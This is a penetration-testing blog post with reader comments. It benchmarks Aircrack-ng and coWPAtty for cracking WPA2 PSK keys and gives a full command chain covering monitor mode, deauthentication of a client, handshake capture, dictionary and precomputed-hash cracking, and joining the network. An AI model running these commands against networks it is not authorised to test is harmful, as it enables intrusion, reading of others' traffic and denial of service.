Watch video on-line: http://g0tmi1k.blip.tv/file/3356785
Download video: http://www.mediafire.com/?9dkjbygu238p2uj
What is this?
Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
It shows 4 different cracks, the time taken and speed of the crack (see results).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & Genpmk (Pre-computed hashes)
How does this work?
To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).
Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.
From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.
If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.
You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)
Results
| Software | Time (Seconds) | Keys Per Second | Pre Calculate Time (Seconds) |
| AirCrack-ng | 256.2 | 652.94 | 0 |
| AirCrack-ng + Airolib-ng | 2 | 65685.4 | 1162.2 |
| Cowpatty | 787.71 | 205.35 | 0 |
| Cowpatty + Genpmk | 1.25 | 129715.92 | 1228.06 |
| AirCrack-ng & Airolib-ng | 1164.2 | 65685.4 | 1162.2 |
| Cowpatty & Genpmk | 1229.31 | 129715.92 | 1228.06 |
The dictionary had 311141 lines (3.33M (3,499,543 bytes))
The WPA key on line: 202762.
Therefore it had to test 65.1% of the dictionary.
Aircrack-ng is better with dictionary attack, whereas coWPAtty & Genpmk is better with Pre-computed hashes (also takes longer to calculate them!)
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz
Name: coWPAtty
Version: 4.3
Home Page: http://www.willhackforsushi.com/Cowpatty.html
Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz
Commands:
airmon-ng start wlan0 airodump-ng mon0 airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0 aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0 aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt airolib-ng crackwpa --import essid essid airolib-ng crackwpa --stats airolib-ng crackwpa --clean all airolib-ng crackwpa --batch airolib-ng crackwpa --verify all aircrack -r crackwpa output-01.cap cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash wpa_passphrase g0tmi1k precivilization > wpa.conf wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf dhclient -r dhclient wlan0 ping 192.168.1.1
Notes:
Song: First Sate - Off the Radar (First State's 808 Clash Mix)
Video length: 08:38
Capture length: 01:14:29
Blog Post: http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html
~g0tmi1k
you are the man..
ReplyDeletethank you my teacher.
@skull2006
ReplyDeleteThanks for the thanks!
i am trying to do this in backtrack 4 inside vitual box, where do i get the dictionary from
ReplyDelete@Motupa
ReplyDelete/pentest/passwords/wordlists/darkc0de.lst
I need your help :x
ReplyDeletehow do i install aircrack?
can you tell me you e-mail?
@Difusal
ReplyDeleteGood guide: http://www.aircrack-ng.org/doku.php?id=install_aircrack
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install
CH 1 ][ Elapsed: 7 hours 21 mins ][ 2008-03-05 16:13 ][ fixed channel wlan0: 2
ReplyDeleteBSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:A4:6C6:66 110 8 46067 42970 5 1 48 WPA2 TKIP PSK WANADOO-DB30
00:18:F6:5F:6D:57 99 0 3320 29 0 7 48 WPA2 W/A2BTHomeHub-C201
00:18:4D:3F:14:3A 99 0 12480 9 0 11 54. WPA2 TKIP PSK StudyWiFi
BSSID STATION PWR Rate Lost Packets Probes
root@bt: #
Please tell me what i can do it to wpa2 crack !?
Big problem :
1.Too mach time -Elapsed: 7 hours 21 mins
2.No-BSSID STATION PWR Rate Lost Packets Probes
Thanks very mach
@Compare
ReplyDeleteOn first glance...
1.) Channels. Your trying to use "channel 1" (Im guessing), but its "fixed" at "channel 2".
2.) Clients. There isn't any connected to any network. (which is an issue when cracking WPA networks)
3.) Which is YOUR network? You didn't say! (Guessing WANADOO-DB30 due to channel, power and data levels)
4.) Your date is waaaaaaaay off.=P
Now...How to crack it.
You NEED another device that is connected to your WiFi network, otherwise you need to deauth a currently connected client.
This shouldn't take take 7 hours to turn on another device that is on YOUR network. If you cant turn on another device, please don't ask for help on how to crack your neighbours WiFi (=.
On a side note: You may have problems detecting clients due to your "channel" problem. A "few" things may cause this...
i got a question, if i monitor traffic from WPA network and decrypt it with the key i got from cracking the handshake is it possible to read? because i understood that WPA/WPA2 use another key that is special for each client. i will be happy if you could explain that, i tried to search over the internet but everybody says different. thanks in advance.
ReplyDelete@omer
ReplyDeleteYes, you can "read" the traffic by decrypting it with the aid of the network key...
Now there are two types of network setup:
> You can have one key that everyone uses: "Pre-shared key" - PSK (Also called "Personal mode").
> You can also setup a "RADIUS WiFi" network, which individually authenticates each user (Which is what I believe your referring too).
Both WEP and WPA protocols allow for theses methods - its just a question of does the hardware, have I got the right software and is it setup correctly.
This site might help you:
http://www.darknet.org.uk/2008/12/confused-by-wep-wpa-tkip-aes-other-wireless-security-acronyms/
How can I add a big dictionary to Backtrack 4?
ReplyDeleteI use it from my flash memory which I installed It by Unebootin?
So , I put the flash in usb & working with it
If I had abig dictionary>>>> How Can I add it in this condition?
& what is the best one? where can I get it?
2nd : I got handshake in wpa2-psk crack by using the aircrack-ng
But each time I try it , I got different key
Which doesn't work......
What can I do in all this problems....?
Finally...U are really good & ur Video was excellent.
ThnXxXxXx again , hope I get the answer soon.
ThnXXXXX
Notice that , I try the method of aircrack by getting the handshake , each time for the same Network
ReplyDelete&&& each time I got different key that doesn't work....
i got wpa hanshake but i cannot crack the password even i use big dictionary.the process to cracking wpa2 too long..can u teach me the fast way plz...
ReplyDeletei try to crack my own wpa wifi key using combofile.txt.. it takes about 5 hours but the password not found.. same as above.. do u have any fast way and its possible to crack the password offline.. means capture the data fisrt then crack it later.. if can how? :)
ReplyDelete@MAtrixboy1
ReplyDeleteAs your using Unebootin to load a "live copy" of backtrack via USB you can't save files in backtrack.
However, You *should* be able to use other wordlist(s) in backtrack, by copying/using them off the same USB each time.
If you wish for backtrack to "remember", may be worth looking into doing Persistent install.
See: http://www.infosecramblings.com/backtrack/backtrack-4-usbpersistent-changesnessus/
There isn't a "best wordlist".
The bigger it is, higher the chance it has more unique combinations, which gives you a higher success rate.
There are a few large wordlists online, for example:
13GB ~ http://hashcrack.blogspot.com/2010/12/wpa-psk-wordlist-download-13gb.html
Please note: Just because its large, doesn't mean it will always work!
You can have a WiFi network that gives out different keys to different users by the aid of a authentication server. Or they could of changed the network key.
You might not be able to join for lots of reasons! You need to gather more information.
However, if there is a authentication server for the different keys, good chance that's your issue...
Thanks for the thanks.
@pp
The only way to speed it up is by having more processing power.
However, if the key isn't in the wordlist - it will not be cracked.
There isn't a faster method (or if there is, its not public!)
"If you wanted to search all the possible keys up to 15 characters long (using all the aforementioned characters) you would have to search about 800 septillion keys. If your computer can calculate a billion keys per second it would take about 24 billion years to try them all. "
http://efreedom.com/Question/2-149888/WEP-WPA-WPA2-Wifi-Sniffing
@haysnamrip
ReplyDeleteThere isn't a way to speed it up! (If there is, its not been made public!)
If the key isn't in the wordlist, it will not be cracked.
HOWEVER as it's your network, you will know what the key is, therefore you can search the wordlist to see if there:
cat combofile.txt | grep "REPLACE_WITH_NETWORK_KEY"
Yes, this already is a off-ine attack! Once you have the handshake, its all done offline
hi g0tmi1k :D i am new with backtrack:D.
ReplyDeleteteach me brother:P...
i have backtrack4 but i know nothing on how to hack wpa/wpa2 AES , TKIP+AES , PSK.
ReplyDeletei owned my router wirelss is AES.
first what should i do?
dont known if you got message in bactrack forum (problme with moderator) so i ask you same question here:
ReplyDeleteg0tmilk please help me, i make dictionary with cruch and type "aircrack-ng output-01.cap -w /location" and after (1 sec) show me messages "passphrase not in dictionary". i also try with a lot of dictionary that i download from web same think. i try with dictionary from backtrack4 pentest folder and it work perfect with them. so what is the problem, why not working with other dictionary?
i watched all you videos and learn a lot from them, thanks man
dude, do you have any demos cracking WPA (TKIP) using the Beck/Tews method (message falsification)? or the more recent Japanese guys updated version (link - http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf). Be interested to actually see something practical on this... thoughts?
ReplyDelete@chie (first post)
ReplyDeleteThere is lots of backtrack, it’s hard to cover it all!
Set yourself some goals - figure out what you want to learn and try a few things. =)
@chie (Second post)
This post is about just that. I’ve also done a few others on the subject too. Try and follow them.
@Marija
If you haven't a low post count, a moderator has to check your post before it can be seen to the board.
I also haven't been able to post on backtrack since after the break in at Christmas.
Well, have you tried to view the wordlist you created from crunch? What commands did you use to create it?
Which wordlists did you download?
How are you running backtrack as well?
Thanks for the thanks
@bobmclane
No I haven't got any video on that style of attack (Beck and Tews).
From my understanding - it still needs a client for the attack to work - as it does a form of "Man In The Middle" style of attack.
However, it does look like WPA-TKIP is complete broken (As it was based on WEP?).
Cheers for the link. I've had a read though and this did pop up:
"The Beck-Tews attack does not work WPA implementations those do not support IEEE802.11e QoS features."
hi gotmilk, pls help!!!
ReplyDeletei am new to backtrack. atm i have got BackTrack 4 R2 Release ISO but i dont know how to get a big file of wordlist for wpa/wpa2? and how do i install it?
@evil_dragon
ReplyDeleteYour questions have been answered in my Januarys rant.
http://g0tmi1k.blogspot.com/2011/01/site-news-january-2011.html
Hi g0tmi1k
ReplyDeleteI wish you compare Pyrit Pre-computed hashes speed with Aircrack-ng & airolib-ng and coWPAtty & Genpmk I really need it
could you update your article and add Pyrit static to it ?
I really want to know which on has a better speed in Pre-computed hashes
@Saeed Y
ReplyDeleteYeah, updating the post to add Pyrit to the list would be a good idea. =)
However, My GPU isn't the most powerful however (just 1x Nvida 8800).
I've still got new videos/script which I've currently got planned to do before I start updating older posts, mind you....
Wonderful
ReplyDeleteYou're the man
thank you here from Brazil
Can you just tell where i can get a dictionarie?
ReplyDeleteIf it is a really stupid question, at least tell me where to start, where can i learn more.
Thanks!
Sorry for my english.
@Produção de Áudio
ReplyDeleteThanks for the thanks =)
@Amblyomma
http://g0tmi1k.blogspot.com/2011/06/dictionaries-wordlists.html
http://g0tmi1k.blogspot.com/2011/01/site-news-january-2011.html
http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
no handshake happened !!!whats the prob....followed ur steps :-(
ReplyDelete@khan.hotguy
ReplyDeleteLots of things!
Move closer to the target, and start by manually disconnecting and re-connecting. When you get the handshake that way, then try de-authing.
Love the website, this is the kind of stuff that makes the web valuable, Thank you for all the info!
ReplyDelete@almostadmin
ReplyDeleteThanks for the thanks =)
Glad you like it all!
hi
ReplyDeleteI have a problem with the tutorial I watched g0tm1k blogspot tutorial called
http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html
I do all that well but when I come to get wpa handshake * The problem is that he does not get * I would help a lot I was looking on the net about this problem but can not find,
I use AirLive wl1700, BT5, dual bot with win7 ...
thanks for the help
@liverpool199
ReplyDeleteAre you in range of the client?
What happens if you manually disconnect and re-join? Are you able to capture it that way?
*e.g. Not using the deauth attack!*